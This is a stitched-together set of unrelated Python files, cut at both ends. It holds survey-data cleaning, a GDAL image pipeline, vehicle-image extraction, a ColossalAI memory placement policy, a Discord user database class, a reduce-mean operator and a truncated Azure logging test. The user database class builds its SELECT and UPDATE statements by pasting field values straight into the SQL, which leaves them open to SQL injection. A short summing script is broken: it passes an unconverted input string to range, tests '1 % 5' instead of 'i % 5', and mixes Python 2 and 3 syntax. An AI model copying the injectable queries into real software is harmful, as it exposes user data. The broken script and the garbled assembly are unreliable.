division = division_matcher[raw_entry[7]]
clean_entry.append(('division', raw_entry[7], division))
# student body diversity perception
student_body_diversity_perception = diverse_matcher[raw_entry[8]]
clean_entry.append(("student_body_diversity_perception", raw_entry[8],
student_body_diversity_perception))
# student faculty staff diversity perception
student_fac_staff_diversity_perception = diverse_matcher[raw_entry[9]]
clean_entry.append(('student_fac_staff_diversity_perception', raw_entry[9],
student_fac_staff_diversity_perception))
# diversity importance
diversity_importance = importance_matcher[raw_entry[10]]
clean_entry.append(('diversity_importance', raw_entry[10], diversity_importance))
# experience loop
categories = (
'diversity_emphesis', 'race_experience', 'financial_experience',
'religion_experience', 'gender_experience', 'sexuality_experience',
'safe_in_buildings', 'safe_walking', 'asking_me_for_help',
'help_availability', 'student_of_diff_race_seek_help',
'greek_life_discriminiation', 'non_greek_life_discriminiation',
'athletics_discrimination', 'non_athletics_discrimination',
'prc_access'
)
number = 11
for cat in categories:
raw_val = raw_entry[number]
clean_val = agreement_matcher[raw_val]
clean_entry.append((cat, raw_val, clean_val))
number += 1
fac_staff_clean_data.append(clean_entry)
except Exception as e:
print("\nProcessing failed for entry {}".format(i))
traceback.print_exc()
raise(e)
return fac_staff_clean_data
def main():
print("Loading fac_staff raw csv.")
fac_staff_data = []
with open(settings.fac_staff_raw_path, 'r') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
fac_staff_data.append(row)
fac_staff_clean_data = clean_fac_staff_data(fac_staff_data)
print('\nFinished processing {} fac_staff responses.'.format(len(fac_staff_clean_data)))
# tools.print_first(3, fac_staff_clean_data)
# deleting old clean data
if os.path.exists(settings.fac_staff_clean_path):
print("Deleting old clean data.")
os.remove(settings.fac_staff_clean_path)
else:
print("No old clean data to delete.")
print("Writing data to: {}".format(settings.fac_staff_clean_path))
try:
with open(settings.fac_staff_clean_path, "w") as f:
f.write(json.dumps(fac_staff_clean_data))
except Exception as e:
print("Failed to write clean fac_staff data!")
raise e
if __name__ == "__main__":
print("Starting clean_data.py\n")
main()
print("\nExiting clean_data.py")
|
from osgeo import gdal
import math
import matplotlib.pyplot as plt
import numpy as np
import os
from osgeo import gdal_array
import pandas as pd
import uuid
import warnings
from .pipesegment import PipeSegment, LoadSegment, MergeSegment
class Image:
def __init__(self, data, name='image', metadata={}):
self.name = name
self.metadata = metadata
self.set_data(data)
def set_data(self, data):
if isinstance(data, np.ndarray) and data.ndim == 2:
data = np.expand_dims(data, axis=0)
self.data = data
def __str__(self):
if self.data.ndim < 3:
raise Exception('! Image data has too few dimensions.')
metastring = str(self.metadata)
if len(metastring)>400:
metastring = metastring[:360] + '...'
return '%s: %d bands, %dx%d, %s, %s' % (self.name,
*np.shape(self.data),
str(self.data.dtype),
metastring)
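# Hedged sketch (invented array/metadata, not part of the original module):
# Image.set_data promotes a 2-D array to a single-band 3-D array, which is
# what __str__ reports below.
def _image_example():
    img = Image(np.zeros((4, 5)), 'demo', {'note': 'example'})
    assert img.data.shape == (1, 4, 5)
    return str(img)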
class Identity(PipeSegment):
"""
This class is an alias for the PipeSegment base class to emphasize
its role as the identity element.
"""
pass
class LoadImageFromDisk(LoadSegment):
"""
Load an image from the file system using GDAL, so it can be fed
into subsequent PipeSegments.
"""
def __init__(self, pathstring, name=None, verbose=False):
super().__init__()
self.pathstring = pathstring
self.name = name
self.verbose = verbose
def load(self):
return self.load_from_disk(self.pathstring, self.name, self.verbose)
def load_from_disk(self, pathstring, name=None, verbose=False):
# Use GDAL to open image file
dataset = gdal.Open(pathstring)
if dataset is None:
raise Exception('! Image file ' + pathstring + ' not found.')
data = dataset.ReadAsArray()
if data.ndim == 2:
data = np.expand_dims(data, axis=0)
metadata = {
'geotransform': dataset.GetGeoTransform(),
'projection_ref': dataset.GetProjectionRef(),
'gcps': dataset.GetGCPs(),
'gcp_projection': dataset.GetGCPProjection(),
'meta': dataset.GetMetadata()
}
metadata['band_meta'] = [dataset.GetRasterBand(band).GetMetadata()
for band in range(1, dataset.RasterCount+1)]
if name is None:
name = os.path.splitext(os.path.split(pathstring)[1])[0]
dataset = None
# Create an Image-class object, and return it
imageobj = Image(data, name, metadata)
if verbose:
print(imageobj)
return imageobj
class LoadImageFromMemory(LoadSegment):
"""
Points to an 'Image'-class image so it can be fed
into subsequent PipeSegments.
"""
def __init__(self, imageobj, name=None, verbose=False):
super().__init__()
self.imageobj = imageobj
self.name = name
self.verbose = verbose
def load(self):
return self.load_from_memory(self.imageobj, self.name, self.verbose)
def load_from_memory(self, imageobj, name=None, verbose=False):
if type(imageobj) is not Image:
raise Exception('! Invalid input type in LoadImageFromMemory.')
if name is not None:
imageobj.name = name
if verbose:
print(imageobj)
return(imageobj)
class LoadImage(LoadImageFromDisk, LoadImageFromMemory):
"""
Makes an image available to subsequent PipeSegments, whether the image
is in the filesystem (in which case 'imageinput' is the path) or an
Image-class variable (in which case 'imageinput' is the variable name).
"""
def __init__(self, imageinput, name=None, verbose=False):
PipeSegment.__init__(self)
self.imageinput = imageinput
self.name = name
self.verbose = verbose
def load(self):
if type(self.imageinput) is Image:
return self.load_from_memory(self.imageinput, self.name, self.verbose)
elif type(self.imageinput) in (str, np.str_):
return self.load_from_disk(self.imageinput, self.name, self.verbose)
else:
raise Exception('! Invalid input type in LoadImage.')
class SaveImage(PipeSegment):
"""
Save an image to disk using GDAL.
"""
def __init__(self, pathstring, driver='GTiff', return_image=True,
save_projection=True, save_metadata=True, no_data_value=None):
super().__init__()
self.pathstring = pathstring
self.driver = driver
self.return_image = return_image
self.save_projection = save_projection
self.save_metadata = save_metadata
self.no_data_value = no_data_value
def transform(self, pin):
# Save image to disk
driver = gdal.GetDriverByName(self.driver)
datatype = gdal_array.NumericTypeCodeToGDALTypeCode(pin.data.dtype)
if datatype is None:
if pin.data.dtype in (bool, np.dtype('bool')):
datatype = gdal.GDT_Byte
else:
warnings.warn('! SaveImage did not find data type match; saving as float.')
datatype = gdal.GDT_Float32
dataset = driver.Create(self.pathstring, pin.data.shape[2], pin.data.shape[1], pin.data.shape[0], datatype)
for band in range(pin.data.shape[0]):
bandptr = dataset.GetRasterBand(band+1)
bandptr.WriteArray(pin.data[band, :, :])
if isinstance(self.no_data_value, str) \
and self.no_data_value.lower() == 'nan':
bandptr.SetNoDataValue(math.nan)
elif self.no_data_value is not None:
bandptr.SetNoDataValue(self.no_data_value)
bandptr.FlushCache()
if self.save_projection:
#First determine which projection system, if any, is used
proj_lens = [0, 0]
proj_keys = ['projection_ref', 'gcp_projection']
for i, proj_key in enumerate(proj_keys):
if proj_key in pin.metadata.keys():
proj_lens[i] = len(pin.metadata[proj_key])
if proj_lens[0] > 0 and proj_lens[0] >= proj_lens[1]:
dataset.SetGeoTransform(pin.metadata['geotransform'])
dataset.SetProjection(pin.metadata['projection_ref'])
elif proj_lens[1] > 0 and proj_lens[1] >= proj_lens[0]:
dataset.SetGCPs(pin.metadata['gcps'],
pin.metadata['gcp_projection'])
if self.save_metadata and 'meta' in pin.metadata.keys():
dataset.SetMetadata(pin.metadata['meta'])
dataset.FlushCache()
# Optionally return image
if self.driver.lower() == 'mem':
return dataset
elif self.return_image:
return pin
else:
return None
class ShowImage(PipeSegment):
"""
Display an image using matplotlib.
"""
def __init__(self, show_text=False, show_image=True, cmap='gray',
vmin=None, vmax=None, bands=None, caption=None,
width=None, height=None):
super().__init__()
self.show_text = show_text
self.show_image = show_image
self.cmap = cmap
self.vmin = vmin
self.vmax = vmax
self.bands = bands
self.caption = caption
self.width = width
self.height = height
def transform(self, pin):
if self.caption is not None:
print(self.caption)
if self.show_text:
print(pin)
if self.show_image:
# Select data, and format it for matplotlib
if self.bands is None:
image_formatted = pin.data
else:
image_formatted = pin.data[self.bands]
pyplot_formatted = np.squeeze(np.moveaxis(image_formatted, 0, -1))
if np.ndim(pyplot_formatted)==3 and self.vmin is not None and self.vmax is not None:
pyplot_formatted = np.clip((pyplot_formatted - self.vmin) / (self.vmax - self.vmin), 0., 1.)
# Select image size
if self.height is None and self.width is None:
rc = {}
elif self.height is None and self.width is not None:
rc = {'figure.figsize': [self.width, self.width]}
elif self.height is not None and self.width is None:
rc = {'figure.figsize': [self.height, self.height]}
else:
rc = {'figure.figsize': [self.width, self.height]}
# Show image
with plt.rc_context(rc):
plt.imshow(pyplot_formatted, cmap=self.cmap,
vmin=self.vmin, vmax=self.vmax)
plt.show()
return pin
class ImageStats(PipeSegment):
"""
    Calculate descriptive statistics about an image
"""
def __init__(self, print_desc=True, print_props=True, return_image=True, return_props=False, median=True, caption=None):
super().__init__()
self.print_desc = print_desc
self.print_props = print_props
self.return_image = return_image
self.return_props = return_props
self.median = median
self.caption = caption
def transform(self, pin):
if self.caption is not None:
print(self.caption)
if self.print_desc:
print(pin)
print()
props = pd.DataFrame({
'min': np.nanmin(pin.data, (1,2)),
'max': np.nanmax(pin.data, (1,2)),
'mean': np.nanmean(pin.data, (1,2)),
'std': np.nanstd(pin.data, (1,2)),
'pos': np.count_nonzero(np.nan_to_num(pin.data, nan=-1.)>0, (1,2)),
'zero': np.count_nonzero(pin.data==0, (1,2)),
'neg': np.count_nonzero(np.nan_to_num(pin.data, nan=1.)<0, (1,2)),
'nan': np.count_nonzero(np.isnan(pin.data), (1,2)),
})
if self.median:
props.insert(3, 'median', np.nanmedian(pin.data, (1,2)))
if self.print_props:
print(props)
print()
if self.return_image and self.return_props:
return (pin, props)
elif self.return_image:
return pin
elif self.return_props:
return props
else:
return None
class MergeToStack(PipeSegment):
"""
Given an iterable of equal-sized images, combine
all of their bands into a single image.
"""
def __init__(self, master=0):
super().__init__()
self.master = master
def transform(self, pin):
# Make list of all the input bands
datalist = [imageobj.data for imageobj in pin]
# Create output image, using name and metadata from designated source
pout = Image(None, pin[self.master].name, pin[self.master].metadata)
pout.data = np.concatenate(datalist, axis=0)
return pout
class MergeToSum(PipeSegment):
"""
Combine an iterable of images by summing the corresponding bands.
Assumes that images are of equal size and have equal numbers of bands.
"""
def __init__(self, master=0):
super().__init__()
self.master = master
def transform(self, pin):
total = pin[self.master].data.copy()
for i in range(len(pin)):
if not i == self.master:
total += pin[i].data
return Image(total, pin[self.master].name, pin[self.master].metadata)
class MergeToProduct(PipeSegment):
"""
Combine an iterable of images by multiplying the corresponding bands.
Assumes that images are of equal size and have equal numbers of bands.
"""
def __init__(self, master=0):
super().__init__()
self.master = master
def transform(self, pin):
product = pin[self.master].data.copy()
for i in range(len(pin)):
if not i == self.master:
product *= pin[i].data
return Image(product, pin[self.master].name, pin[self.master].metadata)
class SelectItem(PipeSegment):
"""
Given an iterable, return one of its items. This is useful when passing
a list of items into, or out of, a custom class.
"""
def __init__(self, index=0):
super().__init__()
self.index = index
def transform(self, pin):
return pin[self.index]
class SelectBands(PipeSegment):
"""
Reorganize the bands in an image. This class can be used to
select, delete, duplicate, or reorder bands.
"""
def __init__(self, bands=[0]):
super().__init__()
if not hasattr(bands, '__iter__'):
bands = [bands]
self.bands = bands
def transform(self, pin):
return Image(pin.data[self.bands, :, :], pin.name, pin.metadata)
class Bounds(PipeSegment):
"""
Output the boundary coordinates [xmin, ymin, xmax, ymax] of an image.
Note: Requires the image to have an affine geotransform, not GCPs.
Note: Only works for a north-up image without rotation or shearing
"""
def transform(self, pin):
gt = pin.metadata['geotransform']
numrows = pin.data.shape[1]
numcols = pin.data.shape[2]
bounds = [gt[0], gt[3] + gt[5]*numrows, gt[0] + gt[1]*numcols, gt[3]]
return bounds
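# Hedged sketch (invented geotransform, not part of the original module): for
# a north-up affine geotransform (x_min, x_res, 0, y_max, 0, -y_res), Bounds
# returns [xmin, ymin, xmax, ymax].
def _bounds_example():
    img = Image(np.zeros((1, 100, 200)), 'demo',
                {'geotransform': (500000.0, 0.5, 0.0, 4100000.0, 0.0, -0.5)})
    assert Bounds().transform(img) == [500000.0, 4099950.0, 500100.0, 4100000.0]
    return Bounds().transform(img)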
class Scale(PipeSegment):
"""
Scale data by a multiplicative factor.
"""
def __init__(self, factor=1.):
super().__init__()
self.factor = factor
def transform(self, pin):
return Image(self.factor * pin.data, pin.name, pin.metadata)
class Crop(PipeSegment):
"""
Crop image based on either pixel coordinates or georeferenced coordinates.
'bounds' is a list specifying the edges: [left, bottom, right, top]
"""
def __init__(self, bounds, mode='pixel'):
super().__init__()
self.bounds = bounds
self.mode = mode
def transform(self, pin):
row_min = self.bounds[3]
row_max = self.bounds[1]
col_min = self.bounds[0]
col_max = self.bounds[2]
if self.mode in ['pixel', 'p', 0]:
srcWin = [col_min, row_min,
col_max - col_min + 1, row_max - row_min + 1]
projWin = None
elif self.mode in ['geo', 'g', 1]:
srcWin = None
projWin = [col_min, row_min, col_max, row_max]
else:
raise Exception('! Invalid mode in Crop')
drivername = 'GTiff'
srcpath = '/vsimem/crop_input_' + str(uuid.uuid4()) + '.tif'
dstpath = '/vsimem/crop_output_' + str(uuid.uuid4()) + '.tif'
(pin * SaveImage(srcpath, driver=drivername))()
gdal.Translate(dstpath, srcpath, srcWin=srcWin, projWin=projWin)
pout = LoadImage(dstpath)()
pout.name = pin.name
if pin.data.dtype in (bool, np.dtype('bool')):
pout.data = pout.data.astype('bool')
driver = gdal.GetDriverByName(drivername)
driver.Delete(srcpath)
driver.Delete(dstpath)
return pout
class CropVariable(Crop):
"""
Like 'Crop', but window coordinates are accepted from another
PipeSegment at runtime instead of via initialization arguments.
"""
def __init__(self, mode='pixel'):
PipeSegment.__init__(self)
self.mode = mode
def transform(self, pin):
imagetocrop = pin[0]
self.bounds = pin[1]
return super().transform(imagetocrop)
class Resize(PipeSegment):
"""
Resize an image to the requested number of pixels
"""
def __init__(self, rows, cols):
super().__init__()
self.rows = rows
self.cols = cols
def transform(self, pin):
return self.resize(pin, self.rows, self.cols)
def resize(self, pin, rows, cols):
drivername = 'GTiff'
srcpath = '/vsimem/resize_input_' + str(uuid.uuid4()) + '.tif'
dstpath = '/vsimem/resize_output_' + str(uuid.uuid4()) + '.tif'
(pin * SaveImage(srcpath, driver=drivername))()
gdal.Translate(dstpath, srcpath, width=cols, height=rows)
pout = LoadImage(dstpath)()
pout.name = pin.name
if pin.data.dtype in (bool, np.dtype('bool')):
pout.data = pout.data.astype('bool')
driver = gdal.GetDriverByName(drivername)
driver.Delete(srcpath)
driver.Delete(dstpath)
return pout
class GetMask(PipeSegment):
"""
Extract a Boolean mask from an image band. NaN is assumed to be the
mask value, unless otherwise specified.
"""
def __init__(self, band=0, flag='nan'):
super().__init__()
self.band = band
self.flag = flag
def transform(self, pin):
if self.flag == 'nan':
data = np.expand_dims(np.invert(np.isnan(pin.data[self.band])), axis=0)
else:
data = np.expand_dims(pin.data[self.band]==self.flag, axis=0)
return Image(data, pin.name, pin.metadata)
class SetMask(PipeSegment):
"""
Given an image and a mask, apply the mask to the image.
More specifically, set the image's pixel value to NaN
(or other specified value) for every pixel where the
mask value is False.
"""
def __init__(self, flag=math.nan, band=None, reverse_order=False):
super().__init__()
self.flag = flag
self.band = band
self.reverse_order = reverse_order
def transform(self, pin):
if not self.reverse_order:
img = pin[0]
mask = pin[1]
else:
img = pin[1]
mask = pin[0]
mark = np.invert(np.squeeze(mask.data))
data = np.copy(img.data)
if self.band is None:
data[:, mark] = self.flag
else:
data[self.band, mark] = self.flag
return Image(data, img.name, img.metadata)
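# Hedged sketch (invented pixel values, not part of the original module):
# GetMask marks non-NaN pixels as True, and SetMask writes 'flag' wherever the
# mask is False, so the NaN pixel below becomes -999.0. The transform methods
# are called directly on in-memory Image objects.
def _mask_round_trip_example():
    img = Image(np.array([[1.0, np.nan], [3.0, 4.0]]), 'demo')
    mask = GetMask(band=0).transform(img)
    masked = SetMask(flag=-999.0).transform((img, mask))
    return masked.data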
class InvertMask(PipeSegment):
"""
Sets all True values in a mask to False and vice versa.
"""
def transform(self, pin):
return Image(np.invert(pin.data), pin.name, pin.metadata)
|
import csv
import cv2
import numpy as np
import pandas as pd
import sys
from moviepy.editor import VideoFileClip
from DataGeneration import *
import concurrent.futures
def extract_process(args):
df = args['df']
basedir = args['basedir']
i = args['i']
for index, row in df.iterrows():
print('Process {} reading row nr {} ({})'.format(i, index, row['image']))
img_bgr = cv2.imread(basedir + row['image'])
img_small = cv2.resize(img_bgr[row['y_min']:row['y_max'], row['x_min']:row['x_max']], (64, 64))
if (row['label'] == 'car') or (row['label'] == 'truck'):
cv2.imwrite('dataset/vehicles/udacity/{}.jpg'.format(index), img_small)
# else:
# cv2.imwrite('dataset/non-vehicles/udacity/{}.jpg'.format(index), img_small)
def extract():
basedir = 'dataset/object-dataset/'
columns = ['image', 'x_min', 'y_min', 'x_max', 'y_max', 'x', 'label', 'color']
df = pd.read_csv(basedir+'labels.csv', sep=' ', names=columns, header=None)
print('Unique labels: ' + str(df['label'].unique()))
num_process = 4
split_size = df.shape[0] // num_process
process_arguments = [{'df': df[i*split_size:(i+1)*split_size], 'basedir': basedir, 'i': i}
for i in range(num_process)]
with concurrent.futures.ProcessPoolExecutor() as executor:
for i, exe in zip(range(num_process), executor.map(extract_process, process_arguments)):
print('Finished process {}'.format(i))
def main():
if False:
if (len(sys.argv) > 1) and isinstance(sys.argv[1], str):
filename = sys.argv[1]
else:
filename = 'test_video.mp4'
print('Processing file ' + filename)
clip1 = VideoFileClip('source_videos/' + filename)#.subclip(0,5)
gen = TrainingDataGenerator()
for frame in clip1.iter_frames():
gen.create_training_data(frame)
else:
print('Extracting images from Udacity database...')
extract()
if __name__ == "__main__":
main()
|
from abc import ABC, abstractmethod
from typing import List, Optional
import torch
from colossalai.utils import get_current_device
from colossalai.utils.memory import colo_device_memory_capacity
from colossalai.gemini.tensor_utils import colo_model_data_tensor_move_inline, colo_tensor_mem_usage
from colossalai.gemini.stateful_tensor import StatefulTensor
from colossalai.gemini.memory_tracer import MemStatsCollector
from typing import Type
class TensorPlacementPolicy(ABC):
def __init__(self, device: Optional[torch.device], mem_stats_collector: Optional[MemStatsCollector] = None) -> None:
self.device: Optional[torch.device] = device
self.mem_stats_collector: Optional[MemStatsCollector] = mem_stats_collector
@abstractmethod
def evict_tensors(self, hold_cuda_tensor_list: List[StatefulTensor], **kwargs) -> None:
raise NotImplementedError
class CPUTensorPlacementPolicy(TensorPlacementPolicy):
def __init__(self, mem_stats_collector: Optional[MemStatsCollector] = None) -> None:
super().__init__(torch.device('cpu'), mem_stats_collector=mem_stats_collector)
def evict_tensors(self, hold_cuda_tensor_list: List[StatefulTensor], **kwargs) -> int:
volume = 0
for t in hold_cuda_tensor_list:
colo_model_data_tensor_move_inline(t, self.device)
volume += t.payload.numel() * t.payload.element_size()
return volume
class CUDATensorPlacementPolicy(TensorPlacementPolicy):
def __init__(self, mem_stats_collector: Optional[MemStatsCollector] = None) -> None:
assert torch.cuda.is_available(), 'Cannot use CUDATensorPlacementPolicy when CUDA is not available'
super().__init__(get_current_device(), mem_stats_collector=mem_stats_collector)
def evict_tensors(self, hold_cuda_tensor_list: List[StatefulTensor], **kwargs) -> int:
return 0
class AutoTensorPlacementPolicy(TensorPlacementPolicy):
def __init__(self, mem_stats_collector: Optional[MemStatsCollector] = None) -> None:
super().__init__(None, mem_stats_collector=mem_stats_collector)
# model data will use 1-self._warmup_non_model_data_ratio CUDA memory in warmup phase
# TODO(ver217): make these args configurable
self._warmup_non_model_data_ratio: float = 0.8
self._steady_cuda_cap_ratio: float = 0.8
def evict_tensors(self,
hold_cuda_tensor_list: List[StatefulTensor],
cuda_demand: int = 0,
warmup: bool = True,
compute_list: List[StatefulTensor] = [],
compute_idx: int = 0,
**kwargs) -> int:
"""
Evict tensors from CUDA device.
Args:
hold_cuda_tensor_list (List[StatefulTensor]): the list of tensor in state of HOLD-like
cuda_demand (int, optional): the volume of data needed on cuda device. Defaults to 0.
            warmup (bool, optional): a flag indicating whether we are in the warmup phase. Defaults to True.
compute_list (List[StatefulTensor], optional): TODO. Defaults to [].
compute_idx (int, optional): the idx of computing device. Defaults to 0.
Raises:
RuntimeError:
Returns:
int: the volume of memory that is evicted
"""
cuda_capacity = colo_device_memory_capacity(get_current_device())
used_cuda_model_data = StatefulTensor.GST_MGR.total_mem['cuda']
if warmup:
# We designate a part of CUDA memory for model data in warmup iterations.
max_cuda_non_model_data_per_period = cuda_capacity * self._warmup_non_model_data_ratio
else:
# max non-model-data cuda memory consumption of this sampling moment and the next sampling moment.
max_cuda_non_model_data_per_period = self.mem_stats_collector.next_period_non_model_data_usage('cuda')
cuda_capacity *= self._steady_cuda_cap_ratio
total_cuda_model_data = cuda_capacity - max_cuda_non_model_data_per_period
avail_cuda_model_data = total_cuda_model_data - used_cuda_model_data
freed_cuda_model_data = 0
if avail_cuda_model_data < cuda_demand:
# Move cuda_demand - avail_cuda_model_data volume of tensors
# to_free_cuda_model_data = cuda_demand - avail_cuda_model_data
to_free_cuda_model_data = cuda_demand - avail_cuda_model_data
to_free_tensor_list = hold_cuda_tensor_list
if not warmup:
next_compute_idx = {t: len(compute_list) for t in hold_cuda_tensor_list}
for i in range(len(compute_list) - 1, compute_idx, -1):
if compute_list[i] in next_compute_idx:
next_compute_idx[compute_list[i]] = i
next_compute_idx = sorted(next_compute_idx.items(), key=lambda pair: pair[1], reverse=True)
to_free_tensor_list = [t for (t, idx) in next_compute_idx]
for t in to_free_tensor_list:
if freed_cuda_model_data >= to_free_cuda_model_data:
break
freed_cuda_model_data += t.payload_size
colo_model_data_tensor_move_inline(t, torch.device('cpu'))
if freed_cuda_model_data < to_free_cuda_model_data:
raise RuntimeError(
f"Adjust layout failed! No enough CUDA memory! Need {to_free_cuda_model_data}, freed {freed_cuda_model_data}"
)
return freed_cuda_model_data
class TensorPlacementPolicyFactory:
@staticmethod
def create(policy_name: str) -> Type[TensorPlacementPolicy]:
if policy_name == 'cpu':
return CPUTensorPlacementPolicy
elif policy_name == 'cuda':
return CUDATensorPlacementPolicy
elif policy_name == 'auto':
return AutoTensorPlacementPolicy
else:
raise TypeError(f"Unknown tensor placement policy {policy_name}")
|
n = input("Enter a number: ")
sum = 0
for i in range(1,n+1):
if ((i % 3)==0) or ((1 % 5)==0):
print i
sum = sum + i
print("The sum of 1 to %d, was %d" % (n, sum))
|
from database import Database
from database.users import User
class UserDatabase(Database):
def get_user(self, user: User):
query = (f"SELECT * from {self.database}.discord_users "
f"WHERE discord_id = {user.discord_id};")
with self:
self.cursor.execute(query)
result = self.cursor.fetchone()
if result:
return User(result[0], result[1])
else:
return False
def create_user(self, user: User):
if not self.get_user(user):
self.add_row(table=f'{self.database}.discord_users',
headers=['discord_id', 'clear_username'],
values=[user.discord_id, user.clear_username])
return
def update_user(self, user):
u = self.get_user(user)
if u != user:
exc = (f"UPDATE {self.database}.discord_users "
f"SET clear_username = '{user.clear_username}' "
f"WHERE clear_username = '{u.clear_username}';")
with self:
self.cursor.execute(exc)
|
from __future__ import absolute_import
import numpy as np
from .Node import Op
from ..gpu_links import reduce_mean
class ReduceMeanOp(Op):
def __init__(self, node_A, axes, keepdims=False, ctx=None):
super().__init__(ReduceMeanOp, [node_A], ctx)
if axes is not None:
if isinstance(axes, int):
axes = [axes]
self.axes = list(axes)
assert all(map(lambda x: isinstance(x, int), self.axes))
if keepdims is not None:
if keepdims is True or keepdims is False:
self.keepdims = [keepdims] * len(self.axes)
else:
keepdims = list(keepdims)
assert len(keepdims) == len(self.axes)
assert all(map(lambda x: isinstance(x, bool), keepdims))
self.keepdims = keepdims
def compute(self, input_vals, output_val, stream_handle=None):
assert self.axes is not None and self.keepdims is not None
if self.on_cpu:
if all(self.keepdims) or not any(self.keepdims):
output_val[:] = np.mean(input_vals[0].asnumpy(), axis=tuple(
self.axes), keepdims=self.keepdims[0])
else:
temp = input_vals[0].asnumpy()
for i in range(len(self.keepdims))[::-1]:
temp = np.mean(
temp, self.axes[i], keepdims=self.keepdims[i])
output_val[:] = temp
else:
reduce_mean(input_vals[0], output_val, self.axes, stream_handle)
def gradient(self, output_grad):
self.grad_set = False
from .MultiplyConst import mul_byconst_op
from .BroadcastShape import broadcast_shape_op
# Here we don't know how to calculate gradient since we don't have shape information
# The const is determined in infer_shape phase.
self.grad_node = mul_byconst_op(broadcast_shape_op(
output_grad, None, None, ctx=self.raw_ctx), None, ctx=self.raw_ctx)
return [self.grad_node]
def infer_shape(self, input_shapes):
assert self.axes is not None and self.keepdims is not None
assert len(input_shapes) == 1
input_shape = list(input_shapes[0])
mean_multiplier = 1
for i in range(len(self.axes)):
if self.axes[i] < 0:
self.axes[i] += len(input_shape)
assert 0 <= self.axes[i] < len(input_shape)
mean_multiplier *= input_shape[self.axes[i]]
input_shape[self.axes[i]] = 1 if self.keepdims[i] else 0
if hasattr(self, 'grad_node'):
self.grad_node.const_attr = 1.0 / mean_multiplier
self.grad_node.inputs[0].target_shape = tuple(input_shapes[0])
add_axes = []
for i in range(len(self.axes)):
if not self.keepdims[i]:
add_axes.append(self.axes[i])
self.grad_node.inputs[0].add_axes = add_axes
input_shape = [x for x in input_shape if x > 0]
if input_shape == []:
return (1,)
else:
return tuple(input_shape)
def forward_deduce_states(self, input_statuses, status, deduce_order):
assert len(input_statuses) == len(self.inputs)
if deduce_order:
order = input_statuses[0].order
if order is not None:
order = list(order)
dup_occur = 0
prev_dup = False
duplicate_candidate = self.axes + [-1]
for i, o in enumerate(order[::-1]):
if o in duplicate_candidate:
if not prev_dup:
dup_occur += 1
prev_dup = True
if o != -1:
order.pop(i)
else:
prev_dup = False
assert dup_occur <= 1, 'Duplicate dimension and reduce dimensions must be consecutive!'
for i in range(len(order)):
order[i] -= sum([x < order[i]
for j, x in enumerate(self.axes) if not self.keepdims[j]])
status.set_order(tuple(order))
else:
state, duplicate = input_statuses[0].get()
if state is not None:
state = dict(state)
for k in self.axes:
if k in state:
duplicate *= state.pop(k)
for k in sorted(state.keys()):
new_k = k - sum([x < k for j, x in enumerate(self.axes) if not self.keepdims[j]])
if new_k != k:
state[new_k] = state.pop(k)
status.set_state(state, duplicate)
def backward_deduce_states(self, status, input_statuses, deduce_order):
assert len(input_statuses) == len(self.inputs)
if hasattr(self, 'grad_node') and not self.grad_set:
self.grad_node.ori_status = input_statuses[0]
self.grad_node.tar_status = status
self.grad_set = True
def reduce_mean_op(node, axes, keepdims=False, ctx=None):
"""Creates a node that represents np.mean(node_A, axis, keepdims).
Parameters:
----
node : Node
    The input node to be averaged.
axes : int or list
    The axis or axes to average over.
keepdims: bool or list
    Whether to keep the reduced dimension(s).
Returns:
----
A new Node instance created by Op.
"""
return ReduceMeanOp(node, axes, keepdims, ctx=ctx)
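# A small numpy-only sketch (independent of the Op machinery above) of the mixed
# keepdims path in ReduceMeanOp.compute: axes are reduced one at a time, last
# listed axis first, so that the remaining axis indices stay valid.
def _sketch_mixed_keepdims_mean(x, axes, keepdims):
    for i in reversed(range(len(keepdims))):
        x = np.mean(x, axes[i], keepdims=keepdims[i])
    return x
# Example: for x of shape (2, 3, 4), axes=[0, 2] and keepdims=[True, False],
# the result has shape (1, 3): axis 2 is dropped, axis 0 is kept as size 1.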
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests the Azure logging collector."""
import unittest
import unittest.mock as mock
from azure.core import exceptions as az_exceptions
from dftimewolf.lib import state
from dftimewolf import config
from dftimewolf.lib.collectors import azure_logging
from dftimewolf.lib.containers.containers import AzureLogs
from dftimewolf.lib import errors
class AzureLogging(unittest.TestCase):
"""Tests for the Azure logging collector."""
def testInitialization(self):
"""Tests that the collector can be initialized."""
test_state = state.DFTimewolfState(config.Config)
azure_logging_collector = azure_logging.AzureLogsCollector(test_state)
self.assertIsNotNone(azure_logging_collector)
# pylint: disable=protected-access
def testSetup(self):
"""Tests that attributes are properly set during setup."""
test_state = state.DFTimewolfState(config.Config)
azure_logging_collector = azure_logging.AzureLogsCollector(test_state)
azure_logging_collector.SetUp(
subscription_id='55c5ff71-b3e2-450d-89da-cb12c1a38d87',
filter_expression='eventTimestamp ge \'2022-02-01\'',
profile_name='profile1')
self.assertEqual(
azure_logging_collector._subscription_id,
'55c5ff71-b3e2-450d-89da-cb12c1a38d87')
self.assertEqual(
azure_logging_collector._filter_expression,
'eventTimestamp ge \'2022-02-01\'')
self.assertEqual(
azure_logging_collector._profile_name, 'profile1')
@mock.patch('libcloudforensics.providers.azure.internal.common.GetCredentials') # pylint: disable=line-too-long
@mock.patch('azure.mgmt.monitor.MonitorManagementClient')
def testProcess(self, mock_monitor, mock_credentials):
"""Tests that the Azure monitor client is called with the correct args."""
# Create mock objects with required attributes - not mocking Azure objects
# directly as this leads to frail mocks based on version-dependent package
# names like azure.mgmt.monitor.v2015_04_01.models._models_py3.EventData.
mock_monitor_client = mock.MagicMock(spec=['activity_logs'])
mock_activity_logs_client = mock.MagicMock(spec=['list'])
mock_event_data = mock.MagicMock(spec=['as_dict'])
mock_monitor_client.activity_logs = mock_activity_logs_client
mock_activity_logs_client.list.return_value = iter([mock_event_data])
mock_event_data.as_dict.return_value = {'log_entry': 1}
mock_monitor.return_value = mock_monitor_client
mock_credentials.return_value = ('_', 'Credentials')
test_state = state.DFTimewolfState(config.Config)
azure_logging_collector = azure_logging.AzureLogsCollector(test_state)
azure_logging_collector.SetUp(
subscription_id='55c5ff71-b3e2-450d-89da-cb12c1a38d87',
filter_expression='eventTimestamp ge \'2022-02-01\'')
azure_logging_collector.Process()
mock_monitor.assert_called_with(
'Credentials', '55c5ff71-b3e2-450d-89da-cb12c1a38d87')
mock_activity_logs_client.list.assert_called_with(
filter='eventTimestamp ge \'2022-02-01\'')
self.assertTrue(test_state.GetContainers(AzureLogs))
# Ensure DFTimewolfError is raised when creds aren't found.
mock_credentials.side_effect = FileNotFoundError
with self.assertRaises(errors.DFTimewolfError):
azure_logging_collector.Process()
mock_credentials.side_effect = None
# Ensure DFTimewolfError is raised when Azure libs raise an exception.
mock_activity_logs_client.list.side_effect = (
